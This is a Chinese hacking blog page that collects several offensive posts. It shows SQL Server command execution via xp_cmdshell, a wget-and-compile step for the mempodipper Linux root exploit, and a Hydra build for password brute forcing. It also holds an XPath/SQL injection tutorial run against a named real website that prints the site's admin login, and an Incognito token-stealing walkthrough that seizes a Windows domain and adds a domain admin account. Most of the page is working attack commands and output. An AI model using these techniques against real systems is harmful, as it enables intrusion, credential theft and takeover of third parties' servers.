Chinadu's Blog

利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单，只需使用下面的SQL语句：

EXEC master.dbo.xp_cmdshell 'dir c:\'

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无法运行任何的cmd命令，很难查看对方计算机的文件、目录、开启的服务，也无法添加NT用户。

对此作过一番研究，后来我发现即使xp_cmdshell不可用了，还是有可能在服务器上运行CMD并得到回显结果的，这里要用到SQL服务器另外的几个系统存储过程：sp_OACreate，sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。
阅读全文...

Metasploit 在 BackTrack 5-R2 中启动不起来

解决办法：

cd /opt/metasploit/common/lib

mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b

mv libssl.so.0.9.8 libssl.so.0.9.8-backup

ln -s /usr/lib/libcrypto.so.0.9.8

ln -s /usr/lib/libssl.so.0.9.8

msfupdate

1.下载漏洞利用文件

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
阅读全文...

Thelong awaited release of the BackTrack 5 R2 kernel has arrived, and it’s now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. We will start a series of blog posts on how to upgrade, deal with VMWare, and even build your own updated BT5 R2 by yourself. For now though, here’s how to get the new kernel and all of the updated goodness:

1. Update and upgrade your BT5 (R1) installation:

第一种，直接登录root用户的图形界面，不用输入密码

1,安装rungetty

2,编辑 /etc/init/tty1.conf

将exec这一段注释掉并加一句

3,编辑.bash_profile文件，如果没有则建立它

第二种：直接启动到图形界面，提示输入用户密码

1,安装gdm

2,设置默认为gdm

3.编辑grub

GRUB_CMDLINE_LINUX_DEFAULT=”text splash vga=791″
修改成quiet
GRUB_CMDLINE_LINUX_DEFAULT=”quiet splash vga=791″

4.更新grub

5.重启

1,VPN拔号:

安装并重启network-manager后，Gnone菜单右上角出现网络的图标，点击添加VPN即可

2, Wicd Network Manager 无线连接界面出错:
Could not connect to wicd’s D-Bus interface.Check the wicd log for error messages.
解决办法：

apt-get purge hydra
apt-get install cmake libssl-dev

cd /usr/local/src
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install

cd /usr/local/src
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install

最后来张效果图

虽然没成功爆出密码，但是能看出爆破速度效率还是不错的

So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I'd thought I'd make a quick tutorial for it.Now I'll be going over both methods just for the sake of adding it to my mega-thread.

Extract Value

I'll be using this site as an example.

Version (ExtractValue)

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

You should get your version.

Getting The Tables (Extract Value)

Code:+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema. ​tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So lets load it up and see if we get our first table name!

Code:

XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

(#‵′)凸
We want users or admin..
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--

Code:

XPATH syntax error: '~pdigexcludes'

Woot, now let's get the columns.

Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema ​.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+fro ​ m+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

Now use increment in your limit statement until you find the columns you want.

Getting Data Out of Columns (ExtractValue)

Now that you've got your column names, you're going to want to put them in a concat statement.

Code:+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+T​ABLENAME+limit+0,1)))--
My columns I wanted were username and password, the 0x7e is the hex value of "~" which I'll use as a seperator.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username ​,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.

Code:XPATH syntax error: '~ishir~ishir123'

UpdateXML

Getting The Version (UpdateXML)

My link looks like this..

We get our XPATH Error that returns the version.
Code:

Getting The Tables (UpdateXML)

My link looks like this..

Code:

Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

For the sake of time, I know the table name I want is tbladmin.
Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:

Now let's get the columns from the table.

Getting Columns (UpdateXML)

Now it's the same idea, we just change the tables to columns, from the table name.

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Getting Data (UpdateXML)

Now once you've got your columns, concatenate them and get the from the table you want.
Code:

My link looks like this..
Code:

渗透某内网时，得一内网SA，外网映射IP未知，开80端口，服务器不可外连，渴此机IIS配置信息，Google之，得方法，遂共享。

iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

但很多情况下如果在服务器直接执行的话，会报错cscript不是默认vbs解释器(iiscnfg是个VBS文件iiscnfg.vbs),所以我们应该用cscript加参数来运行:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS:开始/sp参数后面的路径老不对，后来发现用“/”根路径就可以了，信息还更全。
详细参数请Google。

PS:
标签有网站基本配置信息
标签有网站目录配置信息和其他配置信息
其它自己看

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf